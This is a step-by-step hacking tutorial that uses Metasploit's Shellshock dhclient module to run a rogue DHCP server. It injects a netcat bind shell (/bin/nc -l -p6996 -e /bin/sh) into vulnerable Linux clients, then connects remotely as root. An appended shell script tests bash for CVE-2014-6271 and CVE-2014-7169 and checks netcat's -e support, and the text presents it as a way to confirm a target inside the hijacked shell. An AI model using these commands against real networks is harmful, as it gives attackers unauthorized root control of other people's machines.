Step 1: Start Metasploit
Let's begin, of course, by firing up Kali Linux and starting Metasploit. You should be greeted by a screen similar to the following one.
Step 2: Update Metasploit
Since this is a new Metasploit module, it was not in the Metasploit Framework that shipped with your Kali download, so we need to update Metasploit. Let's open a terminal and type:
kali > msfupdate
This might take awhile, so be patient.
Step 3: Find the Exploit
Now that we updated our Metasploit and presumably downloaded the new Shellshock modules, let's find this new exploit. In the Metasploit framework, type:
msf > search shellshock
As we can see, Metasploit found the auxiliary module for attacking the DHCP client using the Shellshock vulnerability.
Let's now load that module by typing:
msf > use auxiliary/server/dhclient/dhclient_bash_env
Now, let's type info to get more information on this module.
msf > info
We can see in the screenshot above each of the various options for this module and some basic information about it. The key parameters are CMD, SRVHOST, and NETMASK.
Step 4: Set Up the Module Parameters
Now, let's show options.
msf > show options
First, let's set the IP address that our rogue DHCP server will answer from. This is the SRVHOST parameter, and it must be an address on the same network segment as the victim, since DHCP requests are broadcast on the local link.
msf > set SRVHOST 192.168.131.254
Next, let's set the command that we want to inject through the BASH shell. Although this module comes with a netcat command by default, let's change it slightly to a command that I have found gives better and more reliable results. One caveat: the -e option exists only in the traditional (Hobbit/GNU) netcat. The OpenBSD netcat that many distributions install as nc rejects -e, and in that case no listener is ever started on the target.
msf > set CMD /bin/nc -l -p6996 -e /bin/sh
Lastly, let's set the NETMASK.
msf > set NETMASK 255.255.255.0
Finally, let's simply type "exploit" to run the module.
msf > exploit
When we do so, we simply get the message "Auxiliary module execution completed." That message only tells us that the module ran; the real trigger happens on the victim's side. When a vulnerable client on the segment requests a lease (for example at boot, on renewal, or when dhclient is restarted) and accepts our offer, dhclient passes the crafted option to dhclient-script through an environment variable, and an unpatched bash executes the commands hidden in that variable. In our case here, that means our CMD sets up a netcat listener with root privileges on port 6996, handing a /bin/sh shell to whoever chooses to connect to it!
Step 5: Connect to the Exploited System
Now that we have injected netcat into the vulnerable system, we should be able to connect to that machine remotely with administrative/root privileges, because dhclient, and the dhclient-script it runs under bash, execute as root. We would then own that machine!
For demonstration purposes, let's connect to that system with a Windows machine remotely by connecting to the netcat listener. First, open a command prompt on the Windows system and type:
C:\> nc 192.168.131.129 6996
When we do so, it will return a blank line rather than a prompt, because the /bin/sh spawned by netcat is not attached to a terminal. When we type "ifconfig":
ifconfig
It returns the network settings of the exploited Linux system. Now, to confirm our privilege level, let's type "whoami":
whoami
In this screenshot, you can see that we have not only been able to access the system remotely, but we have root privileges. We OWN this system!
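To see the bash behaviour that this whole procedure depends on, here is an added example that is not part of the original tutorial or of the Metasploit module. It checks a bash binary for the original Shellshock bug (CVE-2014-6271) and for the incomplete first fix (CVE-2014-7169), and it checks whether the local netcat supports the -e option that our CMD relies on. The marker string, the temporary directory and the function names are all my own constructions.

```shell
#!/usr/bin/env bash
# Added example (not from the original tutorial): local self-checks for the
# bash bug that the dhclient_bash_env module relies on. A vulnerable bash
# imports a function from ANY environment variable whose value starts with
# "() {" and then keeps parsing, so commands placed after the closing brace
# run when the shell starts. dhclient hands DHCP option values to
# dhclient-script through exactly such environment variables, which is why a
# rogue lease can run CMD as root on the client.

# CVE-2014-6271 (the original Shellshock). Prints VULNERABLE or patched.
# Argument: path to the bash binary to test (default: bash on PATH).
shellshock_check() {
    bash_bin="${1:-bash}"
    # SHELLSHOCK_MARKER is a constructed marker; it shows up in the output
    # only if bash executed the command trailing the function body.
    out="$(env 'x=() { :;}; echo SHELLSHOCK_MARKER' "$bash_bin" -c 'echo probe' 2>/dev/null || true)"
    case "$out" in
        *SHELLSHOCK_MARKER*) echo VULNERABLE ;;
        *) echo patched ;;
    esac
}

# CVE-2014-7169 (the incomplete first fix). The crafted value leaves a
# dangling redirection in the parser, so "echo probe" is parsed as
# ">echo probe" and a file named "echo" appears in the working directory.
# Runs inside a temporary directory so nothing is left behind.
shellshock_check_7169() {
    bash_bin="${1:-bash}"
    tmp="$(mktemp -d)"
    ( cd "$tmp" && env 'X=() { (a)=>\' "$bash_bin" -c 'echo probe' >/dev/null 2>&1 ) || true
    if [ -e "$tmp/echo" ]; then
        result=VULNERABLE
    else
        result=patched
    fi
    rm -rf "$tmp"
    echo "$result"
}

# The tutorial's CMD relies on "nc -e". Only traditional netcat (Hobbit,
# GNU netcat, ncat) lists an -e option in its usage text; the OpenBSD
# variant shipped by many distributions does not, and then no listener is
# ever created on the target. Prints yes or no.
nc_supports_exec() {
    nc_bin="${1:-nc}"
    help="$(command "$nc_bin" -h 2>&1 || true)"
    if printf '%s\n' "$help" | grep -qE '(^|[[:space:]])-e[, ]'; then
        echo yes
    else
        echo no
    fi
}

printf 'bash (CVE-2014-6271): %s\n' "$(shellshock_check)"
printf 'bash (CVE-2014-7169): %s\n' "$(shellshock_check_7169)"
printf 'nc -e available:      %s\n' "$(nc_supports_exec)"
```

Pasting `shellshock_check /bin/bash` into the /bin/sh session obtained in Step 5 confirms that the target's bash is really unpatched, and running `nc_supports_exec` there first tells you whether a CMD built around nc -e can work on that host at all.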